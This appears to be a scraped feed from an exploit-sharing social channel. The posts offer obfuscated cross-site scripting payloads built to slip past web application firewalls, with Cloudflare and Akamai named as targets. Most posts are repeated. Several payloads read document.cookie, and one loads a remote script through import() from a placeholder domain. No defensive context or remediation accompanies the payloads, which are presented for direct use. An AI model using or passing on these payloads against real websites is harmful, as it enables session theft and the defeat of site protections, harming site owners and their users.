XSS WAF Bypass using location concatenation
Payload:
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload:
"><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">
#Xss #WAF #bypass ——————
0Day.Today
@LearnExploit
@Tech_Army
👍8
payloads to bypass CloudFlare WAF
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
"><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">
<--<img/src=%20onerror=confirm``>%20--!>
<iframe src=java&Tab;sc&Tab;ript:al&Tab;ert()></iframe>
<sVg/onLy=1 onLoaD=confirm(1)//
#waf #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
"><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">
<--<img/src=%20onerror=confirm``>%20--!>
<iframe src=java&Tab;sc&Tab;ript:al&Tab;ert()></iframe>
<sVg/onLy=1 onLoaD=confirm(1)//
#waf #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡9👍1
An Akamai WAF bypass
kuromatae"><textarea/onbeforeinput=kuro='//domain.tld';import(kuro)%09autofocus%09x>
#Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
kuromatae"><textarea/onbeforeinput=kuro='//domain.tld';import(kuro)%09autofocus%09x>
#Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡3👍1🔥1
A payload to bypass some WAF
<SvG><set%0Aonbegin%0A=%0aa=confirm;a%28%60xss%60)/x>
#Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
<SvG><set%0Aonbegin%0A=%0aa=confirm;a%28%60xss%60)/x>
#Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡4👍3🔥2
Xss Bypass Waf
——————
0Day.Today
@LearnExploit
@Tech_Army
<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26%2300000000000000000041//
#bypass #waf ——————
0Day.Today
@LearnExploit
@Tech_Army
👍10👎1
CloudFlare WAF bypass payload
<inpuT autofocus oNFocus="setTimeout(function() { /*\*/top['al'+'\u0065'+'rt'](1)/*\*/ }, 5000);"></inpuT%3E;
#WAF #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
<inpuT autofocus oNFocus="setTimeout(function() { /*\*/top['al'+'\u0065'+'rt'](1)/*\*/ }, 5000);"></inpuT%3E;
#WAF #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥7❤2👍2
An Akamai WAF bypass payload
%22onmouseover=window[%27al%27%2B%27er%27%2B([%27t%27,%27b%27,%27c%27][0])](document[%27cooki%27%2B(['e','c','z'][0])]);%22
#Waf #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
%22onmouseover=window[%27al%27%2B%27er%27%2B([%27t%27,%27b%27,%27c%27][0])](document[%27cooki%27%2B(['e','c','z'][0])]);%22
#Waf #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
👍9❤1
An Akamai WAF bypass payload
#WAF #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
1'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](1)>
#WAF #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥3👍1
A payload to bypass WAF
#WAF #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
<detalhes%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26%230000000000000000041//
#WAF #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥4
Cloudflare WAF Bypass ⚡️
#Xss #waf #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
<a"/onclick=(confirm)(origin)>Click Here!#Xss #waf #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡4